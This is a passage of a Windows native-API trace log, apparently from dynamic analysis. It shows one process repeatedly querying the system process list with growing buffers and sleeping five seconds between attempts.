ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.925] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.974] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 